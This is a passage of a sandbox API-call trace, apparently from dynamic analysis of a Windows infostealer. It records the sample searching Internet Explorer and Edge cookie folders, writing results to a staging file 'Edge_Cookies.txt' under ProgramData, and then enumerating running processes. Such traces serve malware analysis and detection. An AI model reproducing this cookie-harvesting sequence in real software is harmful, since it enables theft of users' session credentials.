dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x358 [0108.338] GetFileType (hFile=0x358) returned 0x1 [0108.342] SetFilePointer (in: hFile=0x358, lDistanceToMove=-1, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0108.342] GetLastError () returned 0x83 [0108.342] GetLastError () returned 0x83 [0108.342] SetLastError (dwErrCode=0x83) [0108.342] GetLastError () returned 0x83 [0108.342] SetLastError (dwErrCode=0x83) [0108.342] GetLastError () returned 0x83 [0108.342] SetLastError (dwErrCode=0x83) [0108.342] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a12f0 | out: hHeap=0x29a0000) returned 1 [0108.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x02Ȁ⳰瞒\x82", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0108.342] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x6) returned 0x29a10f8 [0108.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x02Ȁ⳰瞒\x82", cchWideChar=6, lpMultiByteStr=0x29a10f8, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x02????", lpUsedDefaultChar=0x0) returned 6 [0108.343] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10f8 | out: hHeap=0x29a0000) returned 1 [0108.346] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1270 [0108.347] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a10f8 [0108.347] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a12f0 [0108.347] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2) returned 0x29a1060 [0108.426] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1060 | out: hHeap=0x29a0000) returned 1 [0108.426] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2) returned 0x29a1060 [0108.426] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x29a1318 [0108.426] GetLastError () returned 0x83 [0108.426] SetLastError (dwErrCode=0x83) [0108.426] GetLastError () returned 0x83 [0108.426] SetLastError (dwErrCode=0x83) [0108.430] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0xd8) returned 0x29a1338 [0108.434] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x355) returned 0x3970048 [0108.434] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0108.434] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2) returned 0x29a1418 [0108.434] GetLastError () returned 0x83 [0108.434] SetLastError (dwErrCode=0x83) [0108.434] GetLastError () returned 0x83 [0108.434] SetLastError (dwErrCode=0x83) [0108.434] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0xd8) returned 0x3970048 [0108.435] GetLastError () returned 0x83 [0108.435] SetLastError (dwErrCode=0x83) [0108.435] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x355) returned 0x3970128 [0108.435] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970128 | out: hHeap=0x29a0000) returned 1 [0108.435] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1338 | out: hHeap=0x29a0000) returned 1 [0108.435] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2) returned 0x29a1428 [0108.435] GetLastError () returned 0x83 [0108.435] SetLastError (dwErrCode=0x83) [0108.435] GetLastError () returned 0x83 [0108.435] SetLastError (dwErrCode=0x83) [0108.435] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0x200) returned 0x3970128 [0108.435] GetLastError () returned 0x83 [0108.435] SetLastError (dwErrCode=0x83) [0108.435] GetLastError () returned 0x83 [0108.435] SetLastError (dwErrCode=0x83) [0108.435] GetLastError () returned 0x83 [0108.436] SetLastError (dwErrCode=0x83) [0108.436] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0xd8) returned 0x29a1338 [0108.436] GetLastError () returned 0x83 [0108.436] SetLastError (dwErrCode=0x83) [0108.436] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x355) returned 0x3970330 [0108.436] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970330 | out: hHeap=0x29a0000) returned 1 [0108.437] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0108.437] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1428 | out: hHeap=0x29a0000) returned 1 [0108.437] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1418 | out: hHeap=0x29a0000) returned 1 [0108.437] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a1418 [0108.437] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x29a1428 [0108.437] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a1448 [0108.437] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x29a1458 [0108.437] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\\x02????" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\\x02????"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x19f084, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0108.524] GetLastError () returned 0x3 [0108.524] GetLastError () returned 0x3 [0108.524] SetLastError (dwErrCode=0x3) [0108.524] GetLastError () returned 0x3 [0108.524] SetLastError (dwErrCode=0x3) [0108.524] GetLastError () returned 0x3 [0108.525] SetLastError (dwErrCode=0x3) [0108.529] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1270 | out: hHeap=0x29a0000) returned 1 [0108.529] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1448 | out: hHeap=0x29a0000) returned 1 [0108.529] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1428 | out: hHeap=0x29a0000) returned 1 [0108.529] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10f8 | out: hHeap=0x29a0000) returned 1 [0108.529] CloseHandle (hObject=0x358) returned 1 [0108.529] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a12c8 | out: hHeap=0x29a0000) returned 1 [0108.529] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1218 | out: hHeap=0x29a0000) returned 1 [0108.529] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0108.529] GetLastError () returned 0x3 [0108.529] SetLastError (dwErrCode=0x3) [0108.530] GetLastError () returned 0x3 [0108.530] SetLastError (dwErrCode=0x3) [0108.530] GetLastError () returned 0x3 [0108.530] SetLastError (dwErrCode=0x3) [0108.530] GetLastError () returned 0x3 [0108.530] SetLastError (dwErrCode=0x3) [0108.530] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a10d0 [0108.530] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a1218 [0108.530] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0108.530] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1428 [0108.530] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x3970048 [0108.530] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x3970330 [0108.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970330, cbMultiByte=123, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 123 [0108.530] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xf6) returned 0x39703b8 [0108.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970330, cbMultiByte=123, lpWideCharStr=0x39703b8, cchWideChar=123 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\Cookies\\*.cookie") returned 123 [0108.530] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x100) returned 0x39704b8 [0108.530] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703b8 | out: hHeap=0x29a0000) returned 1 [0108.530] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\Cookies\\*.cookie", lpFindFileData=0x19efc4 | out: lpFindFileData=0x19efc4*(dwFileAttributes=0x77920568, ftCreationTime.dwLowDateTime=0x7000007, ftCreationTime.dwHighDateTime=0x7314b0, ftLastAccessTime.dwLowDateTime=0x7314b8, ftLastAccessTime.dwHighDateTime=0x77928232, ftLastWriteTime.dwLowDateTime=0x2400ebcf, ftLastWriteTime.dwHighDateTime=0x92, nFileSizeHigh=0x0, nFileSizeLow=0x29a04c2, dwReserved0=0x120018, dwReserved1=0x745d18, cFileName="\x07܀\x19ѹ瞒ᑂ￿梀瑧\n", cAlternateFileName="￿￿歽谿\x0f")) returned 0xffffffff [0108.637] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704b8 | out: hHeap=0x29a0000) returned 1 [0108.638] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a10d0 [0108.638] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1c) returned 0x29a12a0 [0108.638] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a12c8 [0108.638] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0108.638] FindNextFileW (in: hFindFile=0xffffffff, lpFindFileData=0x19efc4 | out: lpFindFileData=0x19efc4*(dwFileAttributes=0x77920568, ftCreationTime.dwLowDateTime=0x7000007, ftCreationTime.dwHighDateTime=0x7314b0, ftLastAccessTime.dwLowDateTime=0x7314b8, ftLastAccessTime.dwHighDateTime=0x77928232, ftLastWriteTime.dwLowDateTime=0x2400ebcf, ftLastWriteTime.dwHighDateTime=0x92, nFileSizeHigh=0x0, nFileSizeLow=0x29a04c2, dwReserved0=0x120018, dwReserved1=0x745d18, cFileName="\x07܀\x19ѹ瞒ᑂ￿梀瑧\n", cAlternateFileName="￿￿歽谿\x0f")) returned 0 [0108.638] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970330 | out: hHeap=0x29a0000) returned 1 [0108.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1428, cbMultiByte=25, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0108.638] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x39700d0 [0108.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1428, cbMultiByte=25, lpWideCharStr=0x39700d0, cchWideChar=25 | out: lpWideCharStr="Cookies\\Edge_Cookies.txt") returned 25 [0108.638] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1478 [0108.638] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0108.638] CreateFileW (lpFileName="Cookies\\Edge_Cookies.txt" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\cookies\\edge_cookies.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x19f104, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x358 [0108.639] GetFileType (hFile=0x358) returned 0x1 [0108.639] SetFilePointer (in: hFile=0x358, lDistanceToMove=-1, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0108.639] GetLastError () returned 0x83 [0108.639] GetLastError () returned 0x83 [0108.639] SetLastError (dwErrCode=0x83) [0108.639] GetLastError () returned 0x83 [0108.639] SetLastError (dwErrCode=0x83) [0108.639] GetLastError () returned 0x83 [0108.639] SetLastError (dwErrCode=0x83) [0108.639] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0108.639] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a10d0 [0108.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x07܀\x19ѹ瞒ᑂ￿梀瑧\n", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0108.639] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x39700d0 [0108.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x07܀\x19ѹ瞒ᑂ￿梀瑧\n", cchWideChar=12, lpMultiByteStr=0x39700d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x07??\x19??????\n", lpUsedDefaultChar=0x0) returned 12 [0108.639] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0108.639] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x3970330 [0108.639] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a10f8 [0108.640] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x39700d0 [0108.640] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x39700f0 [0108.640] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\Cookies\\\x07??\x19??????\n" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\#!001\\microsoftedge\\cookies\\\x07??\x19??????\n"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x19f084, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0108.642] GetLastError () returned 0x3 [0108.642] GetLastError () returned 0x3 [0108.642] SetLastError (dwErrCode=0x3) [0108.642] GetLastError () returned 0x3 [0108.642] SetLastError (dwErrCode=0x3) [0108.642] GetLastError () returned 0x3 [0108.642] SetLastError (dwErrCode=0x3) [0108.642] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970330 | out: hHeap=0x29a0000) returned 1 [0108.642] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700f0 | out: hHeap=0x29a0000) returned 1 [0108.642] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0108.642] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10f8 | out: hHeap=0x29a0000) returned 1 [0108.642] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0108.642] CloseHandle (hObject=0x358) returned 1 [0108.643] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a12c8 | out: hHeap=0x29a0000) returned 1 [0108.643] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a12a0 | out: hHeap=0x29a0000) returned 1 [0108.643] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0108.643] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1428 | out: hHeap=0x29a0000) returned 1 [0108.643] GetLastError () returned 0x3 [0108.643] SetLastError (dwErrCode=0x3) [0108.643] GetLastError () returned 0x3 [0108.643] SetLastError (dwErrCode=0x3) [0108.643] GetLastError () returned 0x3 [0108.643] SetLastError (dwErrCode=0x3) [0108.643] GetLastError () returned 0x3 [0108.643] SetLastError (dwErrCode=0x3) [0108.643] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x3970048 [0108.643] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1218 | out: hHeap=0x29a0000) returned 1 [0108.643] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1428 [0108.643] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a1218 [0108.643] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x3970330 [0108.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970330, cbMultiByte=120, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 120 [0108.644] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xf0) returned 0x39703b8 [0108.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3970330, cbMultiByte=120, lpWideCharStr=0x39703b8, cchWideChar=120 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\Cookies\\*.txt") returned 120 [0108.644] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xf0) returned 0x39704b0 [0108.644] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703b8 | out: hHeap=0x29a0000) returned 1 [0108.644] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\Cookies\\*.txt", lpFindFileData=0x19efc4 | out: lpFindFileData=0x19efc4*(dwFileAttributes=0x21, ftCreationTime.dwLowDateTime=0x7000007, ftCreationTime.dwHighDateTime=0x6c0260, ftLastAccessTime.dwLowDateTime=0x6c0260, ftLastAccessTime.dwHighDateTime=0x1, ftLastWriteTime.dwLowDateTime=0x2400ebcf, ftLastWriteTime.dwHighDateTime=0xfa, nFileSizeHigh=0x19f0f4, nFileSizeLow=0x29a04c2, dwReserved0=0xa68b5f27, dwReserved1=0xfffffffe, cFileName="\x07܀Ҙ瞒", cAlternateFileName="￿￿歽谿\x0f")) returned 0xffffffff [0108.645] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704b0 | out: hHeap=0x29a0000) returned 1 [0108.645] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1c) returned 0x29a10d0 [0108.645] FindNextFileW (in: hFindFile=0xffffffff, lpFindFileData=0x19efc4 | out: lpFindFileData=0x19efc4*(dwFileAttributes=0x21, ftCreationTime.dwLowDateTime=0x7000007, ftCreationTime.dwHighDateTime=0x6c0260, ftLastAccessTime.dwLowDateTime=0x6c0260, ftLastAccessTime.dwHighDateTime=0x1, ftLastWriteTime.dwLowDateTime=0x2400ebcf, ftLastWriteTime.dwHighDateTime=0xfa, nFileSizeHigh=0x19f0f4, nFileSizeLow=0x29a04c2, dwReserved0=0xa68b5f27, dwReserved1=0xfffffffe, cFileName="\x07܀Ҙ瞒", cAlternateFileName="￿￿歽谿\x0f")) returned 0 [0108.645] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970330 | out: hHeap=0x29a0000) returned 1 [0108.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1428, cbMultiByte=25, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0108.645] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x29a12a0 [0108.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1428, cbMultiByte=25, lpWideCharStr=0x29a12a0, cchWideChar=25 | out: lpWideCharStr="Cookies\\Edge_Cookies.txt") returned 25 [0108.645] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x39700d0 [0108.645] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a12a0 | out: hHeap=0x29a0000) returned 1 [0108.646] CreateFileW (lpFileName="Cookies\\Edge_Cookies.txt" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\cookies\\edge_cookies.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x19f104, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x358 [0108.646] GetFileType (hFile=0x358) returned 0x1 [0108.646] SetFilePointer (in: hFile=0x358, lDistanceToMove=-1, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0108.646] GetLastError () returned 0x83 [0108.646] GetLastError () returned 0x83 [0108.646] SetLastError (dwErrCode=0x83) [0108.646] GetLastError () returned 0x83 [0108.646] SetLastError (dwErrCode=0x83) [0108.646] GetLastError () returned 0x83 [0108.646] SetLastError (dwErrCode=0x83) [0108.646] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0108.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x07܀Ҙ瞒", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.646] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x5) returned 0x29a10f8 [0108.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x07܀Ҙ瞒", cchWideChar=5, lpMultiByteStr=0x29a10f8, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x07???", lpUsedDefaultChar=0x0) returned 5 [0108.647] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10f8 | out: hHeap=0x29a0000) returned 1 [0108.647] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x3970330 [0108.647] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a10f8 [0108.647] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x29a12a0 [0108.647] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a12c0 [0108.647] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\Cookies\\\x07???" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\#!001\\microsoftedge\\cookies\\\x07???"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x19f084, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0108.649] GetLastError () returned 0x3 [0108.649] GetLastError () returned 0x3 [0108.649] SetLastError (dwErrCode=0x3) [0108.649] GetLastError () returned 0x3 [0108.649] SetLastError (dwErrCode=0x3) [0108.649] GetLastError () returned 0x3 [0108.649] SetLastError (dwErrCode=0x3) [0108.649] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970330 | out: hHeap=0x29a0000) returned 1 [0108.649] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a12c0 | out: hHeap=0x29a0000) returned 1 [0108.649] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a12a0 | out: hHeap=0x29a0000) returned 1 [0108.649] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10f8 | out: hHeap=0x29a0000) returned 1 [0108.649] CloseHandle (hObject=0x358) returned 1 [0108.650] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0108.650] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1218 | out: hHeap=0x29a0000) returned 1 [0108.650] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1428 | out: hHeap=0x29a0000) returned 1 [0108.650] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0108.650] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0108.650] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a1428 [0108.650] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x358 [0108.661] Process32First (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.667] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0108.668] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.669] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.670] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.670] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.671] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.672] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.673] Process32Next (in: hSnapshot=0x358, lppe=0x19f410 | out: lppe=0x19f410*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 